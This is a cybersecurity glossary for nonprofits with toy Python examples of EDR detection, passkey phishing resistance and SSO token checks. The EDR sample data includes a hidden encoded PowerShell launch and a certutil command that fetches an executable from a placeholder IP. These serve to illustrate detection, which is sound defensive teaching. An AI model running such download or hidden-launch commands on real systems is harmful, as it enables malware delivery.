In just a few years, generative artificial intelligence has changed much about cybersecurity. Chatbots like ChatGPT are enabling even unsophisticated hackers to sound more realistic, write in many languages, and attempt more cyberattacks with minimal effort. Sophisticated cybercriminals can use existing images, voice recordings, and even videos to make so-called deepfakes, creating convincing digital replicas that can, for example, mimic an executive on a Zoom call.
However, generative A.I. can also strengthen cybersecurity. Defensive tools use it to flag unusual activity and summarize what happened so responders can act faster, and such features are now built into platforms such as Microsoft Office 365 and Google Workspace.
To keep up with advancements in cybersecurity, leaders need to understand key terms and concepts. This glossary of common cybersecurity terms will help.
Cybersecurity Frameworks
For organizations just beginning to design a cybersecurity strategy, it can be helpful to explore cybersecurity frameworks. These are road maps for internal policies and practices that foster a culture of cybersecurity and identify protections needed for tech equipment, cloud-based applications, and data.
Popular frameworks include the NIST Cybersecurity Framework and the CIS Controls. These documents describe the capabilities a security program needs, from identifying assets and protecting them to detecting, responding to, and recovering from attacks, and the CIS Controls add a prioritized list of concrete safeguards to start with. A framework can help a nonprofit structure its cybersecurity program around industry-accepted best practices; assess the severity of potential security risks; create processes and adopt tools to mitigate those risks; build stronger defenses against cyberattacks; and adhere to regulations about data protection and security.
Endpoint
In the context of cybersecurity, an endpoint is any device that connects to a network and runs software. Examples of endpoints include laptops, desktops, smartphones, tablets, printers, and wireless access points. Endpoint security protects these devices from cyberattacks, because each one is a place where an attacker can gain a first foothold.
Endpoint Detection and Response
EDR software runs as an agent on laptops, desktops, servers, and other endpoints and records what happens on them during daily use: which programs start and what started them, which files and settings they change, and which network connections they open. The agent compares that activity against known attacker behavior and against the device's normal baseline. If it detects a likely threat, it can notify an analyst, stop the offending program, or cut the endpoint off from the network so that an intruder cannot move further or steal the information stored on the device.
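To make that concrete, here is a toy EDR-style detector, written for this glossary rather than taken from any product. It runs three common rules over a constructed stream of process-start events (an Office application launching a script host, PowerShell started hidden with an encoded command, and certutil used as a downloader) and then decides, per host, whether to notify an analyst or isolate the machine. The hosts, users, paths and event format are all made up.

```python
"""Toy EDR-style detection over constructed process-creation telemetry.
Added illustration: the field names, hosts and events are made up and
loosely modelled on what an EDR sensor records when a process starts."""
import json
import ntpath

# Constructed sample telemetry (not real logs), one JSON event per line.
SAMPLE_EVENTS = r"""
{"ts":"2024-05-01T09:12:01Z","host":"laptop-17","user":"jdoe","pid":4120,"ppid":3900,"image":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE","cmdline":"WINWORD.EXE grant_proposal.docx"}
{"ts":"2024-05-01T09:12:05Z","host":"laptop-17","user":"jdoe","pid":4188,"ppid":4120,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"ts":"2024-05-01T09:15:30Z","host":"laptop-17","user":"jdoe","pid":4301,"ppid":3900,"image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe notes.txt"}
{"ts":"2024-05-01T09:20:11Z","host":"desk-02","user":"asmith","pid":7710,"ppid":7600,"image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c dir"}
{"ts":"2024-05-01T09:21:40Z","host":"desk-02","user":"asmith","pid":7722,"ppid":7710,"image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe"}
{"ts":"2024-05-01T10:02:00Z","host":"desk-05","user":"mlee","pid":5100,"ppid":5000,"image":"C:\\Program Files\\Microsoft Office\\EXCEL.EXE","cmdline":"EXCEL.EXE budget.xlsx"}
{"ts":"2024-05-01T10:02:09Z","host":"desk-05","user":"mlee","pid":5120,"ppid":5100,"image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c echo hi"}
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# rule name -> severity; the response plan keys off severity
SEVERITY = {
    "office_spawns_script_host": "medium",
    "encoded_hidden_powershell": "high",
    "certutil_download": "high",
}

def parse_events(text):
    """Parse newline-delimited JSON events and attach a lowercase image name."""
    events = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["name"] = ntpath.basename(ev["image"]).lower()
        events.append(ev)
    return events

def _powershell_encoded_hidden(tokens):
    """PowerShell accepts any unambiguous prefix of a parameter name, so '-e',
    '-enc' and '-encodedcommand' are the same switch, and '-w hidden' means
    '-WindowStyle hidden'. Match on the prefix rule rather than exact strings."""
    encoded = any(len(t) >= 2 and "-encodedcommand".startswith(t) for t in tokens)
    hidden = any(tokens[i] == "hidden" and len(tokens[i - 1]) >= 2
                 and "-windowstyle".startswith(tokens[i - 1]) for i in range(1, len(tokens)))
    return encoded and hidden

def detect(events):
    """Run the rules over events in order; return (rule, host, pid, detail) tuples."""
    alerts = []
    seen = {}  # (host, pid) -> event, so a child can look up its parent
    for ev in events:
        seen[(ev["host"], ev["pid"])] = ev
        parent = seen.get((ev["host"], ev["ppid"]))
        tokens = ev["cmdline"].lower().split()
        if parent and parent["name"] in OFFICE_APPS and ev["name"] in SCRIPT_HOSTS:
            alerts.append(("office_spawns_script_host", ev["host"], ev["pid"],
                           f"{parent['name']} -> {ev['name']}"))
        if ev["name"] in ("powershell.exe", "pwsh.exe") and _powershell_encoded_hidden(tokens):
            alerts.append(("encoded_hidden_powershell", ev["host"], ev["pid"], ev["cmdline"]))
        if ev["name"] == "certutil.exe" and "-urlcache" in tokens:
            alerts.append(("certutil_download", ev["host"], ev["pid"], ev["cmdline"]))
    return alerts

def response_plan(alerts):
    """Map alerts to the two escalating EDR actions the text describes: notify a
    human, or isolate the host from the network. Highest severity per host wins."""
    plan = {}
    for rule, host, _pid, _detail in alerts:
        action = "isolate" if SEVERITY[rule] == "high" else "notify"
        if action == "isolate" or host not in plan:
            plan[host] = action
    return plan

if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for alert in found:
        print(*alert)
    print(response_plan(found))
```

Note that the Word-to-PowerShell chain is only visible because the detector keeps the parent process in memory; a rule that looked at each event on its own would see a perfectly ordinary PowerShell launch. That parent-child context is most of what separates EDR from traditional antivirus.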
Identity Provider
An identity provider serves as the single source of truth for a user's digital identity within an organization. It verifies that identity with one or more factors: something the user knows (a password or PIN), something the user has (a phone or hardware security key), or something the user is (a fingerprint or face). Often, IDPs work in concert with single-sign-on (SSO) services (see below), but they can also stand alone. Once a user is verified, the IDP vouches for that identity to cloud applications, typically through standards such as SAML or OpenID Connect, so each application can decide what the user may access without ever handling the password itself. Common IDPs include Google, Microsoft, Okta, and Apple.
Passwordless Authentication
By now, most of us have gotten used to creating a different password for each account we need to access. Passwordless authentication lets users log in without one, for example by unlocking a credential stored on a phone or laptop with a fingerprint or face scan. (The biometric check happens on the device; the fingerprint or face itself is never sent to the service.) Not only is this more convenient for users, but it also removes the risk of employees choosing weak passwords or reusing the same password across many accounts. Hackers often break into accounts by guessing common passwords, trying credentials leaked in past breaches and sold on the dark web, or collecting log-in information through “social engineering,” such as phishing emails. Passkeys, the cross-platform form of passwordless login built on the FIDO standards, are supported by Google, Microsoft, Apple, and Okta.
Phish-Resistant Multifactor Authentication
Multifactor authentication (MFA), which prompts a user for a second proof of identity before granting access, usually a code from a text message or authenticator app or a push notification to approve, is now ubiquitous. But those codes can be phished: a fake login page asks for the password and then the code, and the attacker relays both to the real site within seconds. Phish-resistant MFA closes that gap. Instead of a code the user types, it relies on a cryptographic credential, such as a FIDO2 hardware security key, a passkey, or a smart card, that is bound to the legitimate website's domain. The browser will only use the credential on the genuine site, so there is nothing for a fake page to collect. Unlocking the key usually requires a PIN or a fingerprint, but that check happens on the device, not over the network.
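The following simulation, written for this glossary and not taken from any vendor or standard library, shows why the passkeys and security keys described in the two entries above cannot be phished the way a one-time code can. It models the three parties in a FIDO2/WebAuthn login (the authenticator, the browser, and the website, called the relying party) and then runs a normal login, an adversary-in-the-middle phishing attempt, and a forged response. Two simplifications are assumed and labelled in the code: an HMAC with a per-credential secret stands in for the authenticator's ECDSA key pair, and the relying-party ID is taken to be the page's hostname.

```python
"""Simplified simulation of why FIDO2/WebAuthn credentials (security keys,
passkeys) resist phishing. Added illustration, not any vendor's code.
Simplifications: HMAC with a per-credential secret stands in for the
authenticator's ECDSA key pair (so the relying party stores that secret where
it would really hold a public key), and the RP ID is just the page hostname.
The structure is the real one: the authenticator signs over the RP ID hash
plus a hash of client data that the *browser*, not the page, fills in with
the origin the user is actually on."""
import hashlib
import hmac
import json
import secrets
from urllib.parse import urlparse

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

class Authenticator:
    """Holds one credential per relying-party ID, created at registration."""
    def __init__(self):
        self.credentials = {}  # rp_id -> (credential_id, secret)

    def register(self, rp_id):
        cred_id, secret = secrets.token_hex(8), secrets.token_bytes(32)
        self.credentials[rp_id] = (cred_id, secret)
        return cred_id, secret

    def get_assertion(self, rp_id, client_data):
        if rp_id not in self.credentials:
            return None  # no credential scoped to this RP ID: nothing to sign
        cred_id, secret = self.credentials[rp_id]
        rp_id_hash = sha256(rp_id.encode())
        sig = hmac.new(secret, rp_id_hash + sha256(client_data), "sha256").digest()
        return {"credential_id": cred_id, "rp_id_hash": rp_id_hash, "signature": sig}

def browser_get(authenticator, page_origin, challenge):
    """The browser's part: derive the RP ID from the page the user is really on
    and write that origin into the client data. A phishing page changes neither."""
    rp_id = urlparse(page_origin).hostname
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    return client_data, authenticator.get_assertion(rp_id, client_data)

class RelyingParty:
    def __init__(self, origin):
        self.origin = origin
        self.rp_id = urlparse(origin).hostname
        self.registered = {}  # credential_id -> secret (a public key in reality)
        self.pending = {}     # user -> outstanding challenge

    def start_login(self, user):
        self.pending[user] = secrets.token_urlsafe(32)
        return self.pending[user]

    def finish_login(self, user, client_data, assertion):
        if assertion is None:
            return "rejected: no assertion"
        cd = json.loads(client_data)
        if cd.get("challenge") != self.pending.get(user):
            return "rejected: challenge mismatch"
        if cd.get("origin") != self.origin:
            return "rejected: origin mismatch"
        if assertion["rp_id_hash"] != sha256(self.rp_id.encode()):
            return "rejected: rp id mismatch"
        secret = self.registered.get(assertion["credential_id"])
        if secret is None:
            return "rejected: unknown credential"
        expected = hmac.new(secret, assertion["rp_id_hash"] + sha256(client_data),
                            "sha256").digest()
        if not hmac.compare_digest(expected, assertion["signature"]):
            return "rejected: bad signature"
        del self.pending[user]
        return "ok"

def setup(origin="https://login.example.org"):
    """Constructed relying party plus a user's authenticator enrolled with it."""
    rp, auth = RelyingParty(origin), Authenticator()
    cred_id, secret = auth.register(rp.rp_id)
    rp.registered[cred_id] = secret
    return rp, auth

def legitimate_login(rp, auth, user="jdoe"):
    challenge = rp.start_login(user)
    client_data, assertion = browser_get(auth, rp.origin, challenge)
    return rp.finish_login(user, client_data, assertion)

def phished_login(rp, auth, phish_origin, user="jdoe"):
    """Adversary-in-the-middle phishing: the fake site starts a real login,
    shows the victim the real challenge, and relays whatever comes back."""
    challenge = rp.start_login(user)
    client_data, assertion = browser_get(auth, phish_origin, challenge)
    return rp.finish_login(user, client_data, assertion)

def forged_login(rp, user="jdoe"):
    """Attacker who knows the (non-secret) credential ID fakes client data with
    the real origin and challenge but cannot produce the signature."""
    challenge = rp.start_login(user)
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": rp.origin}, sort_keys=True).encode()
    fake = {"credential_id": next(iter(rp.registered)),
            "rp_id_hash": sha256(rp.rp_id.encode()), "signature": secrets.token_bytes(32)}
    return rp.finish_login(user, client_data, fake)

def relayed_otp_login(expected_code, code_typed_into_phishing_page):
    """Contrast: a one-time code is a bearer secret, so a code typed into a fake
    page can simply be forwarded to the real site and it works."""
    return "ok" if hmac.compare_digest(expected_code, code_typed_into_phishing_page) else "rejected"
```

The phishing case fails before anything is even signed: the victim's browser asks the authenticator for a credential scoped to the fake site's domain, and there is none. Even if an attacker could coax a signature out of the device, the relying party would still reject it because the origin inside the signed client data is not its own. Compare `relayed_otp_login`, where the real site has no way to tell a relayed code from one typed directly.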
Role-Based Access Control
Organizations take a role-based access-control approach to their internal information when they make certain data accessible only to employees in specific roles. For example, personnel records may be open only to the human resources director and the chief technology officer. This way, employees can reach no more information than they need to do their jobs well, a principle known as least privilege. RBAC limits risk by containing the damage from a single mistake: if an employee falls for a phishing scheme, the attacker inherits only that role's access rather than everything the organization holds. Identity providers (IDP) and single sign-on (SSO) make implementing role-based access control much easier, because roles are assigned once, centrally, and enforced across every connected application.
Single Sign-On
With SSO, users don’t enter a separate password, or repeat the MFA process, for each application stored on the cloud. Instead, they enter through a “front door” by signing in once with their organizational username and password, ideally paired with multifactor authentication (MFA). Behind that door, the identity provider vouches for the user to each application, so users do not need to repeatedly enter passwords to access various cloud-based services.
Like passwordless authentication, SSO reduces the risk that an employee would use weak, easy-to-hack passwords for their accounts. It also limits the number of passwords users need to remember — a boon to employees.
Importantly, SSO allows organizations to implement RBAC (see above). Administrators can set and modify, in one place, which employees have access to what information. They can also restrict access to certain applications or data by sign-in location, such as only from within the United States, and seeing where users sign in from helps administrators spot unusual activity. Location rules are a useful filter rather than a guarantee, since an attacker can route traffic through a VPN or proxy in an allowed country. Because access is centralized, administrators can also quickly shut off network access when employees leave, or adjust their access when they move to new internal positions.
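The following toy flow, written for this glossary and not drawn from any identity provider's implementation, ties together the identity provider, single sign-on, and role-based access control entries. An identity provider issues a signed identity token listing the user's groups; a cloud application verifies the token's signature, issuer, audience, and expiry, then maps groups to permissions. It is assumed, and labelled in the code, that the token is an HS256 JWT with a shared secret so the example needs only the standard library; production identity providers sign with an asymmetric key (RS256 or ES256) and publish the public key, but the checks the application performs are the same. The issuer, application names, users, and groups are constructed.

```python
"""Toy SSO flow: an identity provider issues a signed ID token, a cloud app
verifies it, then maps group claims to permissions (RBAC).
Added illustration, not any vendor's implementation. Simplification: the
token is an HS256 JWT (shared secret, stdlib only); production IdPs sign with
an asymmetric key (RS256/ES256) and apps fetch the public key from the IdP's
JWKS endpoint. The checks the app performs are the same either way."""
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

class IdentityProvider:
    """Single source of truth for who exists and which groups they belong to."""
    def __init__(self, issuer, key):
        self.issuer, self.key = issuer, key
        self.directory = {}  # user -> list of groups; removing a user offboards them

    def issue_token(self, user, audience, now, ttl=300):
        if user not in self.directory:
            return None  # offboarded or unknown users get no token for any app
        header = {"alg": "HS256", "typ": "JWT"}
        claims = {"iss": self.issuer, "sub": user, "aud": audience,
                  "iat": now, "exp": now + ttl, "groups": self.directory[user]}
        signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                         + "." + b64url(json.dumps(claims, separators=(",", ":")).encode()))
        sig = hmac.new(self.key, signing_input.encode(), hashlib.sha256).digest()
        return signing_input + "." + b64url(sig)

class ServiceProvider:
    """A cloud app behind SSO. It never sees a password: it trusts exactly one
    issuer, accepts only tokens minted for its own audience, and decides what
    the user may do from the groups the IdP asserts."""
    ROLE_PERMISSIONS = {
        "staff":   {"read:calendar"},
        "hr":      {"read:calendar", "read:personnel", "write:personnel"},
        "finance": {"read:calendar", "read:donors"},
    }

    def __init__(self, audience, issuer, key):
        self.audience, self.issuer, self.key = audience, issuer, key

    def verify(self, token, now):
        if not token or token.count(".") != 2:
            return None, "malformed"
        h, p, s = token.split(".")
        if json.loads(b64url_decode(h)).get("alg") != "HS256":
            return None, "unexpected alg"  # pin the algorithm; never let the token choose
        expected = hmac.new(self.key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None, "bad signature"
        claims = json.loads(b64url_decode(p))
        if claims.get("iss") != self.issuer:
            return None, "wrong issuer"
        if claims.get("aud") != self.audience:
            return None, "wrong audience"  # a token minted for another app is not valid here
        if now >= claims.get("exp", 0):
            return None, "expired"
        return claims, "ok"

    def permissions(self, claims):
        perms = set()
        for group in claims.get("groups", []):
            perms |= self.ROLE_PERMISSIONS.get(group, set())
        return perms

    def authorize(self, token, action, now):
        claims, status = self.verify(token, now)
        if claims is None:
            return False, status
        if action not in self.permissions(claims):
            return False, "forbidden"
        return True, "ok"

def escalate_groups(token, group):
    """What an attacker who edits the token gets: the payload changes, but the
    signature no longer matches it."""
    h, p, s = token.split(".")
    claims = json.loads(b64url_decode(p))
    claims["groups"] = claims.get("groups", []) + [group]
    return h + "." + b64url(json.dumps(claims, separators=(",", ":")).encode()) + "." + s

def build_demo():
    """Constructed tenant: one IdP, two apps sharing its key, two users."""
    key = b"demo-shared-secret-not-for-production"
    idp = IdentityProvider("https://idp.example.org", key)
    idp.directory = {"jdoe": ["staff"], "hr-lead": ["staff", "hr"]}
    hr_app = ServiceProvider("hr-app", idp.issuer, key)
    donor_app = ServiceProvider("donor-app", idp.issuer, key)
    return idp, hr_app, donor_app
```

Three of the checks are where real deployments go wrong: the audience check stops a token issued for one application from being replayed against another; pinning the algorithm stops the classic trick of rewriting the header to disable signature verification; and offboarding happens in the directory alone, because an application that only ever trusts fresh tokens has nothing of its own to revoke.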
Social Engineering
There are many ways cybercriminals may try to break into a nonprofit’s network, and social engineering is one of them. The tactic involves duping people into sharing privileged information or taking a harmful action, such as wiring money or approving a login request. Phishing is the most common social engineering ploy. Unfortunately, social engineering is becoming more sophisticated, because artificial intelligence gives attackers tools that are inexpensive and easy to use. Using publicly available or stolen audio, video, and photos of a real person, fraudsters can create bogus voicemails, videos, and images of that person and trick staff members into sharing privileged information or sending funds to an unauthorized party.
Tabletop Exercise
A tabletop exercise (TTX) is a discussion-based simulation designed to test an organization’s readiness to respond to cybersecurity incidents. These exercises involve key personnel and stakeholders who gather in a controlled environment to work step-by-step through hypothetical scenarios, such as a ransomware attack or data breach. By addressing simulated challenges, participants identify strengths, weaknesses, and gaps in the organization’s incident-response plan.
Tabletop exercises are essential for refining processes, improving communication, and ensuring that staff members understand their roles during a cybersecurity event. For nonprofits, these exercises can help leaders prepare for real-world scenarios without the risk of actual system downtime or data loss.
Example Use Case: A nonprofit conducts a tabletop exercise in which it simulates a phishing attack that leads to unauthorized access of donor data. Through the exercise, the organization’s team identifies a need for improved password policies and better incident communication procedures.
RoundTable has a free guide to facilitating tabletop exercises at your organization, along with 20 prewritten scenarios.
Threat Intelligence
This term refers both to the practice of collecting, analyzing, and sharing information about active attackers, their methods, and the traces they leave (such as malicious domains, IP addresses, and file hashes) and to the results of that analysis. Good threat intelligence enables nonprofits to prioritize security measures in response to real-world information and to stay ahead of threats to their data and tech infrastructure.
Threat Modeling
Nonprofits just beginning to assess their cybersecurity should consider threat modeling. The practice uses a structured set of questions to identify all information that needs to be protected; understand how that data is stored and shared within the organization; consider who might want it and what they could do with it; assess the weak points in its security; and decide which protective steps are worth the effort. The Electronic Frontier Foundation has a useful guide to basic threat modeling.
Joshua Peskay, a cybersecurity expert, reviewed this piece for accuracy.